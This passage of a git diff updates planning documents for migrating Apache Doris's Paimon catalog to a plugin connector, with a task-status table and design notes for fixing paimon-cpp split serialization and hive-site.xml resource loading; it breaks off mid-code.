PaimonConnectorMetadata (getTableStatistics override) | ✅ | ✅ | ✅ (4/0) | ✅ | +| 8 | FIX-READ-NOTNULL | MAJOR | PaimonTypeMapping / mapFields (nullable parity) | ✅ | ✅ | ✅ (12/0) | ✅ | + +Legend: ⬜ todo / 🔄 in progress / ✅ done + +## Notes +- e2e for credential/native-render fixes needs live paimon + S3/OSS/REST infra (CI-skipped) → focus runnable FE **unit tests** (connector module has FakePaimonTable / RecordingPaimonCatalogOps / PaimonCatalogFactoryTest / PaimonScanPlanProviderTest harness). Note live-e2e as gated. +- Confirm each finding against CURRENT code before editing (report is review-only; line numbers may have drifted). +- Connector must not import fe-core (`bash tools/check-connector-imports.sh`). diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index 7377b32ccebb3f..d8390202792fe0 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -114,8 +114,10 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad | P5-T34 | **branch time-travel(新 SPI)**:连接器经 Identifier branch 分量 / branch-table load(`branchManager().branchExists` 校验);scan 读 branch 表 | B5b | C+T | ✅ 连接器(B5b-2c)+fe-core(B5b-3);inert until B7 | D-040;branch 独立 schema/snapshot;详 HANDOFF | | P5-T35 | **incremental `@incr`(新 SPI)**:port ~180 行 `validateIncrementalReadParams` + paimon `incremental-between`/`-timestamp`/`-scan-mode` 键**入连接器**;fe-core 仅传 raw doris incr param map;scan 应用 copy opts | B5b | C+T | ✅ 连接器(B5b-2b)+fe-core(B5b-3);inert until B7 | D-040;与 tableSnapshot 互斥 | | P5-T26 | **procedure DOC no-op**:连接器档 E2 改「NOTHING TO PORT」(非「后续」);钉死两假阳性(Spark migrate_table / iceberg expire_snapshots);记未来 seam 位置(`ExecuteActionFactory:59-62` + 可选 `ConnectorProcedureOps`/E2 P6);可选负回归(CALL/EXECUTE 仍报错)| B6 | D | ✅ | 零 code。B6 firsthand 核实:legacy `datasource/paimon/`+连接器 **0** procedure/action 文件;闭式 reject **双路**——`ALTER…EXECUTE`→`ExecuteActionFactory:59-62`(paimon=`PluginDrivenMvccExternalTable extends ExternalTable`→`else if(instanceof ExternalTable)`→`DdlException`),`CALL paimon.x`→`CallFunc:42-43`(闭式 switch default→`AnalysisException`)。doc 早于设计期已闭环(recon §3.3、connectors/paimon.md E2 行)。**neg-regression 归 B7 live-e2e**(验收 :72;结构已 guard,离线 UT 冗余故不加)| -| P5-T27 | **翻闸**:paimon 入 `SPI_READY_TYPES:52` + 删 built-in case `:142` + `pluginCatalogTypeToEngine` 加 `paimon→ENGINE_PAIMON`(`:937-944`)+ 删 `PhysicalPlanTranslator` PAIMON 分支(`:781`)+import(`:71`)| B7 | C | ⏳ | gated on B2-B5 | -| P5-T28 | **翻闸 GSON 原子**:5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*(table→**通用** `PluginDrivenMvccExternalTable`,D-042,非 paimon 专类);加 5 flavor tag replay 测 | B7 | C+T | ⏳ | 漏 db→ClassCastException | +| P5-T27 | **翻闸**:paimon 入 `SPI_READY_TYPES:52` + 删 built-in case `:142` + `pluginCatalogTypeToEngine` 加 `paimon→ENGINE_PAIMON`(`:937-944`)+ 删 `PhysicalPlanTranslator` PAIMON 分支(`:781`)+import(`:71`)| B7 | C | ✅ IMPLEMENTED(uncommitted,HEAD d2a2c8d)| **⚠️ 翻闸面 > 此 4-site 文档**:2026-06-11 9-agent 分类 + firsthand 证实**文档外 2 必修**(① `UserAuthentication:57-63` 加 PluginDrivenSysExternalTable unwrap = sys-表 auth 回归;② `PluginDrivenExternalTable.getEngine()/getEngineTableTypeName()` 加 `case "paimon"` = engine-名回归)+ `CreateTableInfo:395` 硬编码 MaxCompute 消息须修。余 site 全 LEGACY_DEAD/GENERIC_OK。**全 edit-set + 分类见 HANDOFF + [[catalog-spi-p5-b7-cutover-scope]]**。真正完成门 = B7 live-e2e(用户跑) | +| P5-T28 | **翻闸 GSON 原子**:5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*(table→**通用** `PluginDrivenMvccExternalTable`,D-042,非 paimon 专类);加 5 flavor tag replay 测 | B7 | C+T | ✅ IMPLEMENTED(uncommitted)| 漏 db→ClassCastException。`GsonUtils:391-397/451/472`+删 7 import `:169-175`。**+ 用户签 D-045 = restore SHOW PARTITIONS 5 列 / D-046 = restore SHOW CREATE TABLE LOCATION+PROPERTIES**(full parity,非 MC 缩减;签 D-047=Hybrid SPI)→ **见 T36/T37 ✅** | +| P5-T36 | **D-045 restore SHOW PARTITIONS 5 列**:SPI `ConnectorPartitionInfo` 加 typed `long fileCount`(7-arg ctor,3-arg 默认 UNKNOWN,equals/hashCode);`ConnectorCapability.SUPPORTS_PARTITION_STATS`;`PaimonConnector` 声明 capability + `collectPartitions:891` 喂 `partition.fileCount()`;`ShowPartitionsCommand` capability-gated 5 列 handler + getMetaData(`hasPartitionStatsCapability` 同 gate 两站点;MaxCompute 保持 1 列)| B7 | C+T | ✅ IMPLEMENTED+verified(uncommitted)| D-047=Hybrid。列:Partition/PartitionKey(=表分区列名 comma-join,每行同)/RecordCount(=getRowCount)/FileSizeInBytes(=getSizeBytes)/FileCount(=getFileCount)。**NIT(保留)**:5 列路径应用 partition-name `filterMap`(WHERE Partition=...),legacy 5 列 handler 忽略——新行为更正确(同 1 列/HMS 路径),无 golden 用 WHERE。测:ConnectorPartitionInfoTest(3)+PaimonConnectorMetadataPartitionTest.listPartitionsCarriesFileCount+ShowPartitionsCommandPluginDrivenTest.testHandlerEmitsFiveColumns。4-lens 对抗 review clean | +| P5-T37 | **D-046 restore SHOW CREATE TABLE LOCATION+PROPERTIES**:连接器 `buildTableSchema:202` 把 `((DataTable)table).coreOptions().toMap()`(含 path)+ 注入 `primary-key` merge 入 schemaProps(+ plumb `table` 入参,2 call-site);`PluginDrivenSchemaCacheValue` 加 `tableProperties`(4-arg 重载,3-arg 默认 emptyMap);`PluginDrivenExternalTable.getTableProperties()`(剔 schema-control 键 partition_columns/primary_keys);`Env.getDdlStmt` PLUGIN 分支(`:4927`)render LOCATION ''+PROPERTIES,unwrap `PluginDrivenSysExternalTable`→source,**空-props gate**(MaxCompute 空→保持 comment-only)| B7 | C+T | ✅ IMPLEMENTED+verified(uncommitted)| D-047=Hybrid。byte-parity legacy(golden `test_paimon_table_properties.out`)。**凭据**:firsthand+4-lens credential-leak 证伪——table coreOptions 仅 path/write-only/file.format,catalog 凭据在 catalog 级(B2 已 neuter getProperties),不泄漏。**连接器侧 coreOptions merge 无离线 UT**(FakePaimonTable 非 DataTable)→ code-review + B9 live-e2e 覆盖。测(fe-core 侧):PluginDrivenExternalTablePartitionTest.testGetTableProperties×2。仅 fix 4927(SHOW CREATE 走 `getDdlStmt(Command,...)` 重载;4507 重载 legacy 无 PAIMON LOCATION 故不改)| | P5-T29 | **删 legacy**:`datasource/paimon/`(28) + `metacache/paimon/`(3) + 反向引用;确认零引用;验 paimon-core FE classpath 恰一份(R-004/R-007 NoClassDefFound 守)| B8 | C | ⏳ | gated on 翻闸 live 验 | | P5-T30 | post-cutover 回归:SHOW PARTITIONS + partitions TVF(预接 FE 分发现返行)/DROP·CREATE DB·TABLE/no-ENGINE CREATE/edit-log replay/MTMV 增量刷/sys-table/session-TZ 谓词不丢行 | B9 | T | ⏳ | | diff --git a/plan-doc/tasks/designs/P5-fix-FIX-CPP-READER-design.md b/plan-doc/tasks/designs/P5-fix-FIX-CPP-READER-design.md new file mode 100644 index 00000000000000..e66ba76578e9d5 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-CPP-READER-design.md @@ -0,0 +1,197 @@ +# Problem + +When `enable_paimon_cpp_reader=true`, BE routes Paimon JNI-format splits to the C++ reader (`PaimonCppReader`) instead of the Java JNI reader. The C++ reader deserializes the split with Paimon's **native binary** format (`paimon::Split::Deserialize`). The new connector (`PaimonScanPlanProvider`) ignores the `enable_paimon_cpp_reader` session flag entirely and **always** serializes the split with Java object serialization (`InstantiationUtil.serializeObject`). So when a user (or the regression harness, which randomizes the flag) turns the flag on, BE's `PaimonCppReader::_decode_split` runs a native deserialize over a Java-serialized blob and fails hard with `Status::InternalError("paimon-cpp deserialize split failed: ...")`. The query dies; no rows are read. + +The legacy `PaimonScanNode` honored the flag by switching the split serialization format to Paimon-native (`DataSplit.serialize`) when the flag was on and the split was a `DataSplit`. The connector dropped that branch. + +# Root Cause (confirmed in current code) + +**Connector always Java-serializes, never reads the flag.** +`PaimonScanPlanProvider.buildJniScanRange` (`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java:320-339`) unconditionally does `String serializedSplit = encodeObjectToString(split);` (`:330`). `encodeObjectToString` (`:465-473`) is `InstantiationUtil.serializeObject(obj)` + STANDARD base64 — Java object serialization only. The flag `enable_paimon_cpp_reader` is read nowhere in the connector (verified: `grep` for `enable_paimon`/`getSessionProperties` in the connector main source returns nothing). The `planScan` method receives a `ConnectorSession session` (`:149-153`) but never threads it into `buildJniScanRange`. + +**Legacy honored the flag — the branch the connector dropped.** +`fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java:260-268`: +``` +if (split != null) { + rangeDesc.setFormatType(TFileFormatType.FORMAT_JNI); + if (sessionVariable.isEnablePaimonCppReader() && split instanceof DataSplit) { + fileDesc.setPaimonSplit(PaimonUtil.encodeDataSplitToString((DataSplit) split)); + } else { + fileDesc.setPaimonSplit(PaimonUtil.encodeObjectToString(split)); + } + ... +} +``` +The two encoders differ by wire format: +- `PaimonUtil.encodeObjectToString` (`PaimonUtil.java:519-526`): `InstantiationUtil.serializeObject` + base64 → **Java serialization** (for the Java JNI reader). +- `PaimonUtil.encodeDataSplitToString` (`PaimonUtil.java:533-543`): `split.serialize(new DataOutputViewStreamWrapper(baos))` + base64 → **Paimon native binary** (javadoc: "compatible with paimon-cpp reader"). Applies only to `DataSplit`. + +**BE confirms the format split is correctness-critical, not cosmetic.** +`be/src/exec/scan/file_scanner.cpp:1079-1101`: for `FORMAT_JNI` + `table_format_type == "paimon"`, BE selects `PaimonCppReader` iff `_state->query_options().enable_paimon_cpp_reader`, else `PaimonJniReader`. `be/src/format/table/paimon_cpp_reader.cpp:311-330` (`_decode_split`): base64-decodes `paimon_split` then `paimon::Split::Deserialize(...)` (native), returning `InternalError` on failure. The Java JNI reader instead expects the Java-serialized blob. So the FE format MUST match the flag. + +**The flag is reachable and exercised, not theoretical.** +`enable_paimon_cpp_reader` is a visible, non-removed session var (`SessionVariable.java:2884-2887`, name constant `:774`), so `VariableMgr.toMap` emits it by name (`VariableMgr.java:930-948` skips only REMOVED/INVISIBLE). `ConnectorSessionBuilder.extractSessionProperties` (`ConnectorSessionBuilder.java:116-127`) forwards the whole `toMap` result into `ConnectorSession.getSessionProperties()`. The regression harness randomizes it (`SessionVariable.java:3875` `this.enablePaimonCppReader = random.nextBoolean();`). Default is `false`, so default reads are unaffected; flag-on reproduces deterministically. + +# Design + +Mirror the legacy branch inside the connector, as a small, pure, unit-testable seam — exactly the shape already used for the native-vs-JNI routing decision (`shouldUseNativeReader`, a static at `:366`). + +1. Read the flag once in `planScan` from the session: `boolean cppReader = isCppReaderEnabled(session);` where `isCppReaderEnabled` reads `session.getSessionProperties().get("enable_paimon_cpp_reader")` and parses it as boolean (default false). This is the only place the flag is consumed; no fe-core import — `ConnectorSession` and its `getSessionProperties()` are the established SPI channel (same channel MaxCompute uses for its tunables). + +2. Thread the flag into `buildJniScanRange(...)` as a new `boolean useCppFormat` parameter. + +3. Inside `buildJniScanRange`, select the encoder via a new pure static `encodeSplit(Split split, boolean useCppFormat)`: + - If `useCppFormat && split instanceof DataSplit` → Paimon-native: `((DataSplit) split).serialize(new DataOutputViewStreamWrapper(baos))` + STANDARD base64 (port of `encodeDataSplitToString`). + - Else → existing Java path: `encodeObjectToString(split)`. + + The `instanceof DataSplit` guard is **load-bearing parity**: non-`DataSplit` system splits (the `nonDataSplits` loop, `:206-210`) and the empty-RawFiles JNI fallback for a `DataSplit` (`:246-251`) MUST stay Java-serialized even when the flag is on, because the native binary format only exists for `DataSplit`. Both call sites pass the flag, but the static's guard keeps non-DataSplit on Java automatically — matching legacy's single `split instanceof DataSplit` gate. + +Constraints honored: +- **No fe-core import**: `DataOutputViewStreamWrapper` (paimon-common, already on the connector classpath — same package as the already-imported `org.apache.paimon.io.DataFileMeta`) and `DataSplit.serialize` are pure Paimon SDK. The flag comes through the connector SPI session, not via `SessionVariable`. +- **Minimal/surgical**: no new class; one new static encoder + one new boolean param + one flag-read helper, all in `PaimonScanPlanProvider`. `PaimonScanRange` and `PaimonTableHandle` are untouched (the wire property `paimon.split` and the BE-side `populateRangeParams` are format-agnostic — they carry an opaque base64 string either way; BE picks the decoder off `enable_paimon_cpp_reader`, which is already plumbed independently to BE via `SessionVariable.toThrift`/`query_options`). +- **Style match**: the pure-static + per-call-site-flag pattern is identical to `shouldUseNativeReader`/`supportNativeReader`. + +Note: BE already learns the flag through its own `query_options.enable_paimon_cpp_reader` (set by `SessionVariable.toThrift`, `SessionVariable.java:5526`) — that path is independent of the connector and unchanged. The bug is purely that FE's chosen serialization format must AGREE with the flag BE will read. This fix makes them agree. + +# Implementation Plan + +**File: `.../connector/paimon/PaimonScanPlanProvider.java`** + +Add imports: +```java +import org.apache.paimon.io.DataOutputViewStreamWrapper; +import java.io.ByteArrayOutputStream; +``` + +Add a session-flag constant + reader near the other constants (`:91-99`): +```java +// Session variable name (byte-identical to SessionVariable.ENABLE_PAIMON_CPP_READER) surfaced +// through ConnectorSession.getSessionProperties() (VariableMgr.toMap). When true, BE routes the +// JNI-format paimon split to PaimonCppReader, which deserializes the NATIVE paimon binary format +// (paimon::Split::Deserialize), so FE must serialize a DataSplit with that format, not Java serde. +private static final String ENABLE_PAIMON_CPP_READER = "enable_paimon_cpp_reader"; + +static boolean isCppReaderEnabled(ConnectorSession session) { + if (session == null) { + return false; + } + String v = session.getSessionProperties().get(ENABLE_PAIMON_CPP_READER); + return Boolean.parseBoolean(v); // null/"false" -> false (legacy default) +} +``` + +In `planScan` (`:148-255`): compute the flag once after resolving the handle, and pass it to every `buildJniScanRange` call: +```java +boolean cppReader = isCppReaderEnabled(session); +... +// non-DataSplit loop (:207-210) +ranges.add(buildJniScanRange(split, tableLocation, defaultFileFormat, + Collections.emptyMap(), false, cppReader)); +... +// DataSplit JNI fallback (:248-250) +ranges.add(buildJniScanRange(dataSplit, tableLocation, defaultFileFormat, + partitionValues, true, cppReader)); +``` + +Change `buildJniScanRange` signature + encoder selection (`:320-339`): +```java +private PaimonScanRange buildJniScanRange(Split split, String tableLocation, + String defaultFileFormat, Map partitionValues, + boolean isDataSplit, boolean cppReader) { + long splitWeight = isDataSplit ? computeSplitWeight((DataSplit) split) : split.rowCount(); + String serializedSplit = encodeSplit(split, cppReader); + return new PaimonScanRange.Builder() + .fileFormat("jni") + .paimonSplit(serializedSplit) + .tableLocation(tableLocation) + .partitionValues(partitionValues) + .selfSplitWeight(splitWeight) + .build(); +} +``` + +Add the pure encoder static (next to `encodeObjectToString`, `:465-473`): +```java +/** + * Selects the split serialization that matches the BE reader the engine will use. + * When the paimon-cpp reader is enabled AND the split is a {@link DataSplit}, serialize with + * Paimon's NATIVE binary format ({@code DataSplit.serialize}) so BE's PaimonCppReader + * ({@code paimon::Split::Deserialize}) can decode it. Otherwise (flag off, or a non-DataSplit + * system split that has no native format) fall back to Java object serialization for the Java + * JNI reader. Mirrors legacy PaimonScanNode.setPaimonParams + PaimonUtil.encodeDataSplitToString. + */ +static String encodeSplit(Split split, boolean cppReader) { + if (cppReader && split instanceof DataSplit) { + try { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ((DataSplit) split).serialize(new DataOutputViewStreamWrapper(baos)); + return new String(BASE64_ENCODER.encode(baos.toByteArray()), StandardCharsets.UTF_8); + } catch (Exception e) { + throw new RuntimeException("Failed to serialize Paimon DataSplit (native format): " + + e.getMessage(), e); + } + } + return encodeObjectToString(split); +} +``` +(Uses the existing `BASE64_ENCODER` STANDARD encoder, matching legacy `Base64.getEncoder()` and the BE `base64_decode`.) + +**File: `.../paimon/PaimonScanPlanProviderTest.java`** — add UTs (below). + +# Risk Analysis + +- **Parity vs legacy**: byte-exact. Legacy native encoder = `DataSplit.serialize(DataOutputViewStreamWrapper)` + `Base64.getEncoder()`; ported verbatim. Legacy gate = `enablePaimonCppReader && split instanceof DataSplit`; ported verbatim (flag via SPI session + the `instanceof DataSplit` guard inside `encodeSplit`). The Java-serialization default path is unchanged, so flag-off behavior is bit-for-bit identical to today. +- **Non-DataSplit / fallback splits**: must NOT switch to native even with the flag on (no native binary exists for them). The `instanceof DataSplit` guard preserves this; verified against legacy which only specializes `DataSplit`. A regression here (e.g. forcing native for all) would re-break system tables and the no-raw-file JNI fallback under the cpp reader — covered by a UT below. +- **Shared-code blast radius**: zero. Change is confined to `PaimonScanPlanProvider`. `PaimonScanRange`/`PaimonTableHandle`/thrift/BE are untouched; the wire property `paimon.split` stays an opaque base64 string and BE's reader selection already keys off its own `query_options.enable_paimon_cpp_reader` (independent path, unchanged). +- **Classpath**: `DataOutputViewStreamWrapper` is in paimon-common (transitive via paimon-core; same package as already-imported `org.apache.paimon.io.DataFileMeta`). No new dependency. Verified the class is present in `paimon-common-1.3.1.jar` and `DataSplit`/`Split` in `paimon-core`. +- **Edge cases**: (a) flag value casing/whitespace — `Boolean.parseBoolean` is null-safe and case-insensitive, defaults false; matches the boolean session var emission `"true"`/`"false"`. (b) `session == null` (defensive, e.g. some test paths) → treated as flag-off. (c) COUNT-pushdown / native-reader ranges never call `buildJniScanRange`, so they are inherently unaffected (they don't carry a `paimon.split`). +- **Out of scope (intentionally not bundled)**: the separate partition-render BLOCKER and statistics MAJOR are tracked under their own fixes; this change touches only split serialization selection. + +# Test Plan + +## Unit Tests (in `PaimonScanPlanProviderTest`, offline, run in CI) + +These fail before the fix (the seam `encodeSplit` and flag-read don't exist / are never applied) and pass after, and they encode WHY (the format MUST match the flag BE will read), not just WHAT. + +1. **`cppReaderFlagSelectsNativeBinaryForDataSplit`** — Build a REAL `DataSplit` offline using the proven `PaimonTableSerdeRoundTripTest` recipe (local `FileSystemCatalog` over `LocalFileIO` under `@TempDir`, real partitioned/keyed table, write a couple rows via the table's `BatchWriteBuilder`, then `table.newReadBuilder().newScan().plan().splits()` to obtain a genuine `DataSplit`). Assert: + - `encodeSplit(dataSplit, /*cppReader*/ true)` base64-decodes (STANDARD) to bytes that `DataSplit.deserialize(DataInputViewStreamWrapper)` round-trips back to an equal `DataSplit` (the native format BE's `paimon::Split::Deserialize` consumes), AND + - it does NOT equal `encodeObjectToString(dataSplit)` (proves the format actually changed). + - WHY: pins that flag-on yields the native wire format BE cpp reader can decode. MUTATION: dropping the `cppReader` branch → both encodings equal / native deserialize fails → red. + +2. **`cppReaderFlagOffKeepsJavaSerialization`** — Same real `DataSplit`. Assert `encodeSplit(dataSplit, false)` equals `encodeObjectToString(dataSplit)` (Java serde, byte-for-byte). WHY: default reads must be untouched. MUTATION: always-native → red. + +3. **`nonDataSplitStaysJavaSerializedEvenWithCppFlag`** — A `Split` that is NOT a `DataSplit` (a tiny test `Split` stub, or a non-DataSplit obtained from a system table). Assert `encodeSplit(stub, /*cppReader*/ true)` equals `encodeObjectToString(stub)` — native format is never applied to non-DataSplit. WHY: the `instanceof DataSplit` parity gate (system splits / no-raw-file fallback have no native binary form). MUTATION: removing the `instanceof DataSplit` guard → `ClassCastException`/wrong format → red. + +4. **`isCppReaderEnabledReadsSessionProperty`** — Using a minimal `ConnectorSession` (the existing `TzSession` pattern, overriding `getSessionProperties`): + - `{"enable_paimon_cpp_reader":"true"}` → `isCppReaderEnabled` true; + - `"false"` / absent / `null` session → false. + - WHY: pins the exact SPI key (`"enable_paimon_cpp_reader"`, byte-identical to `SessionVariable.ENABLE_PAIMON_CPP_READER`) and the default-false semantics. MUTATION: wrong key, or defaulting true → red. + +(Existing serde round-trip test `PaimonTableSerdeRoundTripTest` already covers the serialized-Table wire; these new tests add the serialized-SPLIT wire for the cpp path.) + +## E2E Tests + +Live/CI-skipped (env-gated, like `PaimonLiveConnectivityTest`): the true end-to-end proof needs a running BE with the paimon-cpp reader and a real Paimon table. The regression suite already randomizes `enable_paimon_cpp_reader` (`random.nextBoolean()`), so existing paimon read regressions (e.g. `external_table_p2/paimon/*`) will exercise both branches once run against a BE; before the fix a flag-on run dies with `paimon-cpp deserialize split failed`, after the fix it reads correctly. No new BE-dependent test is added in this connector-only change; the offline UTs above pin the FE-side format contract deterministically in CI. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonScanPlanProviderTest 12/0, incl. 4 new; imports clean; HEAD uncommitted).** + +## Fix (1 production file: `PaimonScanPlanProvider.java`) +- Imports: `java.io.ByteArrayOutputStream`, `org.apache.paimon.io.DataOutputViewStreamWrapper`. +- Constant `ENABLE_PAIMON_CPP_READER = "enable_paimon_cpp_reader"` + static `isCppReaderEnabled(ConnectorSession)` (reads `session.getSessionProperties()`, `Boolean.parseBoolean`, null-safe default false). +- `planScan` reads the flag once (`boolean cppReader = isCppReaderEnabled(session)`) and passes it to both `buildJniScanRange` call sites. +- `buildJniScanRange` gains a `boolean cppReader` param; serialization switched from `encodeObjectToString` → new static `encodeSplit(split, cppReader)`. +- `encodeSplit`: when `cppReader && split instanceof DataSplit` → native `DataSplit.serialize(DataOutputViewStreamWrapper)` + STANDARD base64; else → existing Java `encodeObjectToString`. The `instanceof DataSplit` guard is load-bearing parity. + +## Tests (4 new in `PaimonScanPlanProviderTest`) +- `cppReaderFlagSelectsNativeBinaryForDataSplit` / `cppReaderFlagOffKeepsJavaSerialization`: build a REAL `DataSplit` offline (local FileSystemCatalog + write 2 rows via BatchWriteBuilder + plan().splits()); native wire round-trips via `DataSplit.deserialize` and differs from the Java leg; flag-off equals the Java leg byte-for-byte. +- `nonDataSplitStaysJavaSerializedEvenWithCppFlag`: a `NonDataSplitStub implements Split` stays Java-serialized even with flag on (instanceof guard). +- `isCppReaderEnabledReadsSessionProperty`: exact key + default-false (true/false/absent/null-session). + +## Note +- `encodeObjectToString` kept PRIVATE; the flag-off parity test reproduces the Java serde inline (`feJavaEncode`, identical to `PaimonTableSerdeRoundTripTest`'s helper) rather than widening production visibility. + +## Live-e2e (gated, NOT run): the regression harness randomizes `enable_paimon_cpp_reader`; existing paimon read suites exercise both branches against a real BE. diff --git a/plan-doc/tasks/designs/P5-fix-FIX-HMS-CONFRES-design.md b/plan-doc/tasks/designs/P5-fix-FIX-HMS-CONFRES-design.md new file mode 100644 index 00000000000000..3ce1ed21a2a73c --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-HMS-CONFRES-design.md @@ -0,0 +1,168 @@ +# Problem + +When a Paimon HMS catalog is created with `hive.conf.resources` pointing at an external `hive-site.xml` (e.g. `CREATE CATALOG ... 'paimon.catalog.type'='hms','hive.conf.resources'='hive-site.xml'`), the legacy code loaded that file into the `HiveConf` used to build the catalog, so every key in it (custom `hive.metastore.*`, SASL `qop`, kerberos, socket/timeout, SSL truststore, metastore-URI override, custom Thrift transport) reached the live `HiveMetaStoreClient`. The new SPI connector path silently drops the file: `PaimonCatalogFactory.buildHmsHiveConf` reconstructs the `HiveConf` from the raw property map only and never opens `hive.conf.resources`. Result: any HMS catalog whose connection-critical settings live *only* in an external `hive-site.xml` connects with a degraded/wrong `HiveConf` and fails the handshake or behaves incorrectly against the metastore — a silent parity regression now that paimon is in `SPI_READY_TYPES` (cutover gate open). + +Confirmed by the clean-room review: CONFIRMED 3 / REFUTED 0 / PARTIAL 0 (path LIVE + file content truly dropped + legacy truly loaded it into the catalog `HiveConf`). The one inaccurate detail in the finding (it claimed legacy `PaimonHMSMetaStoreProperties`'s `ExecutionAuthenticator` is reused — the connector actually builds auth independently via `ConnectorContext.executeAuthenticated`) is orthogonal and does not change the confirmed defect. + +# Root Cause (confirmed in current code) + +**Legacy loaded the file as the BASE of the catalog HiveConf.** `fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/HMSBaseProperties.java:195-210` (`checkAndInit`): `this.hiveConf = loadHiveConfFromFile(hiveConfResourcesConfig)` (line 197) then overlays user `hive.*` overrides (line 199), then `hive.metastore.uris` (line 200), then the timeout default. `loadHiveConfFromFile` (`HMSBaseProperties.java:188-193`) delegates to `CatalogConfigFileUtils.loadHiveConfFromHiveConfDir(resourceConfig)`. That `HiveConf` is consumed by `PaimonHMSMetaStoreProperties.buildHiveConfiguration` (`fe/fe-core/.../metastore/PaimonHMSMetaStoreProperties.java:77-86`, `conf = hmsBaseProperties.getHiveConf()`) and passed to `CatalogFactory.createCatalog` in `initializeCatalog` (lines 89-101). + +**The file loader resolves names against a config dir.** `fe/fe-common/src/main/java/org/apache/doris/common/CatalogConfigFileUtils.java:95-102` (`loadHiveConfFromHiveConfDir`): comma-splits the resource list, prepends `Config.hadoop_config_dir` (= `$DORIS_HOME/plugins/hadoop_conf/`, `Config.java:2961`), requires each file to exist, and `HiveConf.addResource(Path)` each. This is filesystem + FE-`Config` work — inherently an fe-core/fe-common concern. + +**The connector never opens the file.** `fe/fe-connector/fe-connector-paimon/.../PaimonCatalogFactory.java:363-425` (`buildHmsHiveConf`) builds a fresh `new HiveConf()` and only: copies verbatim `hive.*` map keys (366-370), sets `hive.metastore.uris` (372-375), copies a fixed auth-key set (378-398), sets kerberos-conditional keys (392-412), defaults the socket timeout (418-420), overlays storage config (423). The Javadoc at lines 349-360 explicitly states loading the external `hive-site.xml` is DEFERRED because "legacy resolved it through fe-core `CatalogConfigFileUtils`, which the connector cannot import." The connector consumes it at `PaimonConnector.java:158-159` (`buildHmsHiveConf(properties)` → `CatalogContext.create(options, hc)`). `hive.conf.resources`, if present, falls through `buildHmsHiveConf` as a non-`hive.*` key and is dropped entirely. + +**Why the connector "cannot import" it.** `fe/fe-connector/fe-connector-paimon/pom.xml` depends on `fe-connector-spi`, `fe-connector-api`, `fe-thrift` (provided), paimon, hadoop-common, hive-common — **no `fe-common` and no `fe-core`**. So `CatalogConfigFileUtils`, `Config.hadoop_config_dir`, and `EnvUtils.getDorisHome()` are all unavailable to the connector. The file-resolution must happen on the FE side and be handed to the connector. + +# Design + +**Resolve the file FE-side; merge connector-side.** The connector already has the established pattern for "FE-owned config the connector needs": `ConnectorContext`. The JDBC driver-dir case routes `Config` values through `ConnectorContext.getEnvironment()` (`DefaultConnectorContext.buildEnvironment` → consumed by `PaimonConnector.resolveFullDriverUrl`). Filesystem resolution of `hive.conf.resources` is the same shape, but the *value* is a set of key/value pairs parsed from XML, not a single string — so a dedicated typed hook is cleaner than stuffing serialized XML into the env map. + +Add one default method to the SPI: + +```java +// ConnectorContext (fe-connector-spi) +/** Resolves comma-separated hive config resource file names (relative to the FE's + * hadoop_config_dir) into a flat key->value map. Default: empty (no file support). */ +default Map loadHiveConfResources(String resources) { + return Collections.emptyMap(); +} +``` + +- **fe-core override** (`DefaultConnectorContext`) implements it by calling the existing `CatalogConfigFileUtils.loadHiveConfFromHiveConfDir(resources)` and flattening the returned `HiveConf` (which is a Hadoop `Configuration`) into a `Map` via iteration. This reuses the EXACT legacy loader (same `hadoop_config_dir`, same comma-split, same fail-if-missing), so file-resolution semantics are byte-identical to legacy and live entirely in fe-core where `Config`/filesystem access belongs. +- **connector merge** stays pure and fe-core-free: `buildHmsHiveConf` gains an overload that takes the pre-resolved `Map` of file keys and applies them as the BASE of the `HiveConf`, before the user `hive.*` overrides — matching legacy precedence (file is base, user `hive.*` wins, then `hive.metastore.uris`, then timeout default). `PaimonConnector` resolves the file via the new context hook and passes the map in. + +This is the report's preferred remediation ("route `hive.conf.resources` resolution through a `ConnectorContext` hook; FE loads the file via `CatalogConfigFileUtils` and passes resolved key/values into connector properties"). It keeps the no-fe-core-import rule intact: the connector never touches `CatalogConfigFileUtils`/`Config`/filesystem; it only receives an already-resolved map. `buildHmsHiveConf` stays PURE (map in, conf out) for offline unit testing — the impure file read sits behind the context hook. + +**Right side for each piece:** +- File discovery + parsing (filesystem, `Config.hadoop_config_dir`, fail-on-missing): **fe-core** (`DefaultConnectorContext`), reusing `CatalogConfigFileUtils`. +- SPI surface: **fe-connector-spi** (`ConnectorContext`), default no-op so other connectors are unaffected. +- HiveConf assembly + precedence: **connector** (`PaimonCatalogFactory` / `PaimonConnector`), unchanged purity. + +**Rejected alternative — bridge merges a legacy-built HiveConf:** would require the connector to receive a live `HiveConf` object across the plugin classloader boundary, re-introducing exactly the cross-loader `Configuration`/`HiveConf` identity hazard already flagged at `PaimonConnector.java:152-157`. Passing a plain `Map` avoids that. + +# Implementation Plan + +**1. `fe/fe-connector/fe-connector-spi/.../ConnectorContext.java`** — add default hook (alongside `getEnvironment`): + +```java +import java.util.Collections; +import java.util.Map; +... +/** + * Resolves the catalog's {@code hive.conf.resources} (comma-separated hive-site.xml file + * names under the FE's hadoop_config_dir) into a flat key->value map the connector can + * overlay onto its HiveConf. The default returns empty (no external file support); the + * fe-core context loads the files via CatalogConfigFileUtils, matching legacy HMS behavior. + * + * @throws RuntimeException if a referenced file is missing/unreadable (fail-loud, legacy parity) + */ +default Map loadHiveConfResources(String resources) { + return Collections.emptyMap(); +} +``` + +**2. `fe/fe-core/.../connector/DefaultConnectorContext.java`** — implement it: + +```java +@Override +public Map loadHiveConfResources(String resources) { + if (Strings.isNullOrEmpty(resources)) { + return Collections.emptyMap(); + } + HiveConf hc = CatalogConfigFileUtils.loadHiveConfFromHiveConfDir(resources); // legacy loader, 